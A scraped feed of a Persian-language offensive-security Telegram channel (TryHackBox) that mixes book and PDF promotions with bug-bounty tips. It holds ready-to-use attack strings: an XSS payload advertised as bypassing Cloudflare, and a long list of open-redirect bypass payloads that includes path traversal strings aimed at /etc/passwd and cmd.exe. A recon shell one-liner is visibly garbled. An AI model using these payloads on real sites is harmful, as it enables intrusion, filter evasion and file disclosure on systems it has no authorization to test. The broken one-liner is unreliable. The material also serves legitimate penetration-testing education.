Forwarded from
📖 وایرشارک برای ردتیمرها: از پایه تا پیشرفته
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
نمونه کتاب
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
📚 عنوان کتاب: وایرشارک برای ردتیمرها (Wireshark for Red Teamers)
این کتاب یک راهنمای جامع و عملی برای یادگیری ابزار قدرتمند Wireshark است، با تمرکز ویژه روی کاربردهای آن در حوزه Red Teaming (تیم قرمز) و امنیت سایبری تهاجمی. کتاب از پایه شروع می کند و به مفاهیم پیشرفته مانند تحلیل ترافیک شبکه، شناسایی آسیبپذیریها، و تکنیکهای نفوذ می پردازد. محتوای اصلی کتاب شامل فصلهایی مانند معرفی Wireshark، درک ترافیک شبکه، تکنیکهای کپچرینگ پکتها، فیلترینگ، و کاربردهای عملی در Reconnaissance (شناسایی) و Command and Control (C2) است.
این کتاب مناسب چه کسانی است؟
ویژگی های کتاب ؟
چرا باید این کتاب را بخرید؟
دانلود فایل های تمرین و سناریوها
نمونه کتاب
توضیحات کامل را بخوانید .
💰 قیمت : ۲۵۰,۰۰۰ تومان
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
❤4👍2
RCE Vulnerability Check List by THB Team.pdf
690.2 KB
🔖 چک لیست آسیبپذیری RCE
⭕ تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره برداری از آسیبپذیریهای RCE آماده کرده. این چک لیست شامل روشهای مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینکهای مفید برای مطالعه بیشتر همراهه.
@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
⭕ تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره برداری از آسیبپذیریهای RCE آماده کرده. این چک لیست شامل روشهای مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینکهای مفید برای مطالعه بیشتر همراهه.
مطالعه کنید و نظراتتون رو برامون بنویسید
@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
❤8
XSS Bypass Cloudflare Payload:
لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
1❤10🎃3👍1
Forwarded from TryHackBox Story
مروری بر پست های گذشته
نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 1.
نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 2.
زندانیان، 2 کامپیوتر و هک شبکه زندان.
جاسوسیهای سایبرنتیک KGB - من به اطلاعات دشمن دسترسی دارم، پس هستم.
حمله خرس سیاه به چشم عقاب، عملیات بر علیه یانکیها در مرزهای سایبرنتیک
شبگردی مخوف: جزئیات هولناک عملیات جاسوسی سایبری Moonlight Maze - بخش اول
شبگردی مخوف: جزئیات هولناک عملیات جاسوسی سایبری Moonlight Maze - بخش دوم
رمزگشایی تاریک بخش اول: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت
در رابطه با خبر باج ۳ میلیون دلاری
حمله بزرگ سایبری اخیر به بانکهای ایرانی
گروه هکری #حنظله #Handala و فعالیتهای آن علیه اسرائیل
ایمیلهای بین آیآر لیکس و آرش بابایی
رمزگشایی تاریک بخش دوم: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت
سه میلیون دلار باج پرداخت شد، آیا رقم نجومی بود؟
حملات طیف الکترومغناطیس بر علیه باطری گوشیهای همراه
نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 1.
نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 2.
زندانیان، 2 کامپیوتر و هک شبکه زندان.
جاسوسیهای سایبرنتیک KGB - من به اطلاعات دشمن دسترسی دارم، پس هستم.
حمله خرس سیاه به چشم عقاب، عملیات بر علیه یانکیها در مرزهای سایبرنتیک
شبگردی مخوف: جزئیات هولناک عملیات جاسوسی سایبری Moonlight Maze - بخش اول
شبگردی مخوف: جزئیات هولناک عملیات جاسوسی سایبری Moonlight Maze - بخش دوم
رمزگشایی تاریک بخش اول: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت
در رابطه با خبر باج ۳ میلیون دلاری
حمله بزرگ سایبری اخیر به بانکهای ایرانی
گروه هکری #حنظله #Handala و فعالیتهای آن علیه اسرائیل
ایمیلهای بین آیآر لیکس و آرش بابایی
رمزگشایی تاریک بخش دوم: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت
سه میلیون دلار باج پرداخت شد، آیا رقم نجومی بود؟
حملات طیف الکترومغناطیس بر علیه باطری گوشیهای همراه
❤2
SE in Red Teaming by THB Team.pdf
1.2 MB
🔖 مهندسی اجتماعی در ردتیمینگ
⚠️ این آموزش صرفاً برای ارتقای امنیت و آگاهی سایبری است و هیچ استفادهٔ غیرمجاز از آن مجاز نیست
@TryHackBox | Github | YouTube | Group
#SE #RedTeam
#مهندسی_اجتماعی
این راهنمای خلاصه و عملی یک مرجع کاربردی برای طراحی و اجرای سناریوهای اجتماعی مهندسی در عملیاتهای ردتیم است:
تاثیرات مهندسی اجتماعی
تکنیک های رایج مهندسی اجتماعی
ابزارها و تکنیک ها
ابزارهای اوسینت
⚠️ این آموزش صرفاً برای ارتقای امنیت و آگاهی سایبری است و هیچ استفادهٔ غیرمجاز از آن مجاز نیست
⭕️ شما کدام تکنیکِ مهندسی اجتماعی (فیشینگ، pretexting، یا baiting) رو بیش از همه برای سناریوهای ردتیم مؤثر میدونید؟ نظر خودتون رو بنویسید.
@TryHackBox | Github | YouTube | Group
#SE #RedTeam
#مهندسی_اجتماعی
🔥9
⚒️🪲 تبهای مفید Burp Suite
📌 Proxy
— ترافیک HTTP/S بین مرورگر شما و سرور را رهگیری و تحلیل میکند.
📌 Repeater
— اجازه میدهد درخواستهای HTTP مشخص را چندبار ارسال، ویرایش و آزمایش کنید.
📌 Intruder
— برای تستهای خودکار مثل حملات سِری (brute-force)، فازینگ (fuzzing) و سایر سناریوهای خودکار به کار میرود.
📌 Extender
— امکان افزودن افزونههای سفارشی یا پلاگینهای شخص ثالث برای افزایش قابلیتها را فراهم میکند.
@TryHackBox
#tools #BurpSuite
📌 Proxy
— ترافیک HTTP/S بین مرورگر شما و سرور را رهگیری و تحلیل میکند.
📌 Repeater
— اجازه میدهد درخواستهای HTTP مشخص را چندبار ارسال، ویرایش و آزمایش کنید.
📌 Intruder
— برای تستهای خودکار مثل حملات سِری (brute-force)، فازینگ (fuzzing) و سایر سناریوهای خودکار به کار میرود.
📌 Extender
— امکان افزودن افزونههای سفارشی یا پلاگینهای شخص ثالث برای افزایش قابلیتها را فراهم میکند.
@TryHackBox
#tools #BurpSuite
🔥11❤4
WBP-PVD THB Team.pdf
2.2 MB
🔖 پنتست به روش «جعبهسفید»: دیباگ آسیب پذیری های Python
عمیقاً واردِ کشف آسیبپذیری ها در اپلیکیشن های وب نوشتهشده به Python شوید و یاد بگیرید چگونه در VS Code دیباگ کنید تا پیلود را در سراسر فرایند دنبال کنید.
⭕ محتوای راهنما:
✅ نصب منابع لازم: VS Code، Python Debugger، Docker
✅ ساختار فایل
✅ کشف آسیب پذیری های Python
✅ آسیب پذیری های رایج در Python
✅ نکات برای بهبود تست به روش «جعبهسیاه» با استفاده از تحلیل کد
@TryHackBox | Github | YouTube | Group
#pentest #tools #python
عمیقاً واردِ کشف آسیبپذیری ها در اپلیکیشن های وب نوشتهشده به Python شوید و یاد بگیرید چگونه در VS Code دیباگ کنید تا پیلود را در سراسر فرایند دنبال کنید.
⭕ محتوای راهنما:
✅ نصب منابع لازم: VS Code، Python Debugger، Docker
✅ ساختار فایل
✅ کشف آسیب پذیری های Python
✅ آسیب پذیری های رایج در Python
✅ نکات برای بهبود تست به روش «جعبهسیاه» با استفاده از تحلیل کد
@TryHackBox | Github | YouTube | Group
#pentest #tools #python
👍4❤1
هفتم آبانماه، «روز کوروش بزرگ» بر همه ایرانیان و ایرانیتباران فرخنده و همایون باد.
کوروش بزرگ نماد همبستگی اقوام ایرانی و عامل پیوند فرهنگی تاریخی ایرانزمین است.
کوروش بزرگ پیام آور صلح و دوستی، احترام به اقوام، دین و مذهب و فرهنگ و زبان مردم شاهنشاهی بزرگ ایران دوره هخامنشی و پدید آورنده نخستین منشور حقوق بشر جهانی است.
ای انسان هر که باشی واز هر جا که بیایی
میدانم خواهی آمد
من کوروشم که برای پارسی ها این دولت وسیع را بنا نهادم
بدین مشتی خاک که تن مرا پوشانده رشک مبر
متن آرامگاه کوروش بزرگ
@TryHackBox
کوروش بزرگ نماد همبستگی اقوام ایرانی و عامل پیوند فرهنگی تاریخی ایرانزمین است.
کوروش بزرگ پیام آور صلح و دوستی، احترام به اقوام، دین و مذهب و فرهنگ و زبان مردم شاهنشاهی بزرگ ایران دوره هخامنشی و پدید آورنده نخستین منشور حقوق بشر جهانی است.
ای انسان هر که باشی واز هر جا که بیایی
میدانم خواهی آمد
من کوروشم که برای پارسی ها این دولت وسیع را بنا نهادم
بدین مشتی خاک که تن مرا پوشانده رشک مبر
متن آرامگاه کوروش بزرگ
@TryHackBox
❤15👎2
ماتریس تاکتیکهای MITRE ATT&CK
مراحل مختلف یک حمله سایبری (چرخه kill chain) را بر اساس مدل MITRE ATT&CK نشان میدهیم. هر بخش یک "تکنیک " است که مهاجمان برای نفوذ و موفقیت در حمله خود به کار میبرند.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
مراحل مختلف یک حمله سایبری (چرخه kill chain) را بر اساس مدل MITRE ATT&CK نشان میدهیم. هر بخش یک "تکنیک " است که مهاجمان برای نفوذ و موفقیت در حمله خود به کار میبرند.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
🔥7👍2
🗺 حمله سایبری یک فرآیند مرحلهبهمرحله است. مهاجم از جمعآوری اطلاعات شروع میکند، Tools میسازد، نفوذ میکند، در سیستم پنهان میشود، حرکت میکند، دادهها را میدزدد و در نهایت آنها را خارج میکند.
📚مهمترین نکته برای شما به عنوان مدافع برای هر مرحله از این چرخه، یک اقدام دفاعی مشخص وجود دارد. شما با درک این مراحل میتوانید:
--> از ورود مهاجم جلوگیری کنید (مثلاً با فیلتر ایمیل و وصله کردن سیستم).
--> حرکت او را در شبکه محدود کنید (با تقسیمبندی شبکه).
--> دسترسی او را بگیرید (با سیاست کمترین دسترسی).
--> دادههای خود را ایمن نگه دارید (با پشتیبانگیری).
--> و در نهایت، اگر حملهای رخ داد، به سرعت آن را شناسایی و پاسخ دهید (Incident response).
این نما به شما کمک میکند تا امنیت خود را به صورت لایهای و مرحلهای تقویت کنید.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
📚مهمترین نکته برای شما به عنوان مدافع برای هر مرحله از این چرخه، یک اقدام دفاعی مشخص وجود دارد. شما با درک این مراحل میتوانید:
--> از ورود مهاجم جلوگیری کنید (مثلاً با فیلتر ایمیل و وصله کردن سیستم).
--> حرکت او را در شبکه محدود کنید (با تقسیمبندی شبکه).
--> دسترسی او را بگیرید (با سیاست کمترین دسترسی).
--> دادههای خود را ایمن نگه دارید (با پشتیبانگیری).
--> و در نهایت، اگر حملهای رخ داد، به سرعت آن را شناسایی و پاسخ دهید (Incident response).
این نما به شما کمک میکند تا امنیت خود را به صورت لایهای و مرحلهای تقویت کنید.
✍️نویسنده
@TryHackBox | The Chaos
#MITRE #Kill_Chain #Hacking #CyberSecurity
❤12
تمام اندپوینت ها را از یک فایل JS استخراج کنید و باگ خود را بگیرید .
- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['\"](https?:)?[\/1{1,2}[^' \"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt
@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/\/#\\/\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt
@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
🔥7❤4👍1
🔖 لیستی از مطالعه باگ بانتی : مجموعه ای منتخب از مقالات و منابع برای شکارچیان باگ بانتی .
https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
❤13
This media is not supported in your browser
VIEW IN TELEGRAM
نکته #باگ_بانتی استخراج URLهای فایل های جاوااسکریپت از هر صفحه!
فراموش کن DevTools رو باز کنی از این بوکمارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایلهای جاوااسکریپت لینک شده رو جمع کن
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک مارکت:
چطور استفاده کن:
یه بوکمارکت جدید تو مرورگرت بساز.
کد بالا رو تو فیلد URL بچسبون.
به سایت هدف برو و بوکمارکت رو کلیک کن.
فایل javanoscript_urls.txt با همه لینکهای.js دانلود میشه.
حالا میتونی اینو به:
LinkFinder
SecretFinder
JSParser
یا تحلیل دستی بدی!
@TryHackBox
فراموش کن DevTools رو باز کنی از این بوکمارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایلهای جاوااسکریپت لینک شده رو جمع کن
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک مارکت:
javanoscript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javanoscript_urls.txt';a.click();})();چطور استفاده کن:
یه بوکمارکت جدید تو مرورگرت بساز.
کد بالا رو تو فیلد URL بچسبون.
به سایت هدف برو و بوکمارکت رو کلیک کن.
فایل javanoscript_urls.txt با همه لینکهای.js دانلود میشه.
حالا میتونی اینو به:
LinkFinder
SecretFinder
JSParser
یا تحلیل دستی بدی!
@TryHackBox
❤18👍2🔥2
🔖 میتونی این Bypass دستی مؤثر برای open redirect رو امتحان کنی
💢 ۱. تزریق Null-byte:
⦁ /google.com%00/
⦁ //google.com%00
💢 ۲. تغییرات(variations) انکودینگ Base64:
⦁ aHR0cDovL2dvb2dsZS5jb20=
⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
⦁ //base64:d3d3Lmdvb2dsZS5jb20=/
💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
⦁ //GOOGLE.com/
⦁ //GoOgLe.com/
💢 ۴. توالی های UTF-8 طولانی:
⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
⦁ %C0%AF%C0%AF%2F%2Fgoogle.com
💢 ۵. طرح های انکودینگ مخلوط:
⦁ /%68%74%74%70://google.com
⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
⦁ //base64:%2F%2Fgoogle.com/
💢 ۶. نوتاسیون های(notations) جایگزین دامنه:
⦁ //google.com@127.0.0.1/
⦁ //127.0.0.1.xip.io/
⦁ //0x7F000001/ (IP هگزادسیمال)
💢 ۷. کاراکترهای خاص Trailing:
⦁ //google.com/#/
⦁ //google.com/;&/
⦁ //google.com/?id=123&//
💢 ۸. فرمت آدرس IP اکتال( Octal ):
⦁ http://0177.0.0.1/
⦁ http://00177.0000.0000.0001/
💢 ۹. تغییرات آدرس IP:
⦁ http://3232235777 (نوتاسیون دسیمال IP)
⦁ http://0xC0A80001 (نوتاسیون هگز IP)
⦁ http://192.168.1.1/
💢 ۱۰. Path traversal با انکودینگ:
⦁ /..%252f..%252f..%252fetc/passwd
⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe
💢 ۱۱. گنجاندن پروتکل inclusion:
⦁ ftp://google.com/
⦁ javanoscript:alert(1)//google.com
💢 ۱۲. URLهای نسبی پروتکل:
-:////google.com/
-:///google.com/
💢 ۱۳. موارد لبه redirect:
⦁ //google.com/?q=//bing.com/
⦁ //google.com?q=https://another-site.com/
💢 ۱۴. نوتاسیون IPv6:
⦁ http://[::1]/
⦁ http://[::ffff:192.168.1.1]/
💢 ۱۵. انکودینگ دوگانه URL:
⦁ %252f%252fgoogle.com (دو بار انکود شده)
⦁ %255cgoogle.com
💢 ۱۶. ترکیب traversal و انکودینگ:
⦁ /%2E%2E/%2E%2E/etc/passwd
⦁ /%2e%2e%5c%2e%2e/etc/passwd
💢 ۱۷. مبتنی بر Reverse DNS:
⦁ https://google.com.reverselookup.com
⦁ //lookup-reversed.google.com/
💢 ۱۸. پورت های غیراستاندارد:
⦁ http://google.com:81/
⦁ https://google.com:444/
💢 ۱۹. پنهان سازی یونیکد در مسیرها:
⦁ /%E2%80%8Egoogle.com/
⦁ /%C2%A0google.com/
💢 ۲۰. پنهان سازی پارامترهای کوئری:
⦁ //google.com/?q=http://another-site.com/
⦁ //google.com/?redirect=https://google.com/
💢 ۲۱. استفاده از سمبل @ برای userinfo:
⦁ https://admin:password@google.com/
⦁ http://@google.com
💢 ۲۲. ترکیب userinfo و traversal:
⦁ https://admin:password@google.com/../../etc/passwd
@TryHackBox
#بایپس
💢 ۱. تزریق Null-byte:
⦁ /google.com%00/
⦁ //google.com%00
💢 ۲. تغییرات(variations) انکودینگ Base64:
⦁ aHR0cDovL2dvb2dsZS5jb20=
⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
⦁ //base64:d3d3Lmdvb2dsZS5jb20=/
💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
⦁ //GOOGLE.com/
⦁ //GoOgLe.com/
💢 ۴. توالی های UTF-8 طولانی:
⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
⦁ %C0%AF%C0%AF%2F%2Fgoogle.com
💢 ۵. طرح های انکودینگ مخلوط:
⦁ /%68%74%74%70://google.com
⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
⦁ //base64:%2F%2Fgoogle.com/
💢 ۶. نوتاسیون های(notations) جایگزین دامنه:
⦁ //google.com@127.0.0.1/
⦁ //127.0.0.1.xip.io/
⦁ //0x7F000001/ (IP هگزادسیمال)
💢 ۷. کاراکترهای خاص Trailing:
⦁ //google.com/#/
⦁ //google.com/;&/
⦁ //google.com/?id=123&//
💢 ۸. فرمت آدرس IP اکتال( Octal ):
⦁ http://0177.0.0.1/
⦁ http://00177.0000.0000.0001/
💢 ۹. تغییرات آدرس IP:
⦁ http://3232235777 (نوتاسیون دسیمال IP)
⦁ http://0xC0A80001 (نوتاسیون هگز IP)
⦁ http://192.168.1.1/
💢 ۱۰. Path traversal با انکودینگ:
⦁ /..%252f..%252f..%252fetc/passwd
⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe
💢 ۱۱. گنجاندن پروتکل inclusion:
⦁ ftp://google.com/
⦁ javanoscript:alert(1)//google.com
💢 ۱۲. URLهای نسبی پروتکل:
-:////google.com/
-:///google.com/
💢 ۱۳. موارد لبه redirect:
⦁ //google.com/?q=//bing.com/
⦁ //google.com?q=https://another-site.com/
💢 ۱۴. نوتاسیون IPv6:
⦁ http://[::1]/
⦁ http://[::ffff:192.168.1.1]/
💢 ۱۵. انکودینگ دوگانه URL:
⦁ %252f%252fgoogle.com (دو بار انکود شده)
⦁ %255cgoogle.com
💢 ۱۶. ترکیب traversal و انکودینگ:
⦁ /%2E%2E/%2E%2E/etc/passwd
⦁ /%2e%2e%5c%2e%2e/etc/passwd
💢 ۱۷. مبتنی بر Reverse DNS:
⦁ https://google.com.reverselookup.com
⦁ //lookup-reversed.google.com/
💢 ۱۸. پورت های غیراستاندارد:
⦁ http://google.com:81/
⦁ https://google.com:444/
💢 ۱۹. پنهان سازی یونیکد در مسیرها:
⦁ /%E2%80%8Egoogle.com/
⦁ /%C2%A0google.com/
💢 ۲۰. پنهان سازی پارامترهای کوئری:
⦁ //google.com/?q=http://another-site.com/
⦁ //google.com/?redirect=https://google.com/
💢 ۲۱. استفاده از سمبل @ برای userinfo:
⦁ https://admin:password@google.com/
⦁ http://@google.com
💢 ۲۲. ترکیب userinfo و traversal:
⦁ https://admin:password@google.com/../../etc/passwd
@TryHackBox
#بایپس
Another Site
Home - Another Site
Embrace Life’s Journey with Us About Read About Travel Embark on a journey of discovery with our travel content, where every destination is a story waiting to be told. From the sun-kissed shores of exotic beaches to the charming cobblestone streets of historic…
👍12
🔖 لیست تکنیک های شناسایی (recon) که تقریباً هیچ کسی امتحان نمیکنه
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم شده روی "localhost"
• بروت فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت ها با هدرهای user-agent مختلف
@TryHackBox
#باگ_بانتی #شناسایی
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم شده روی "localhost"
• بروت فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت ها با هدرهای user-agent مختلف
@TryHackBox
#باگ_بانتی #شناسایی
👍10❤2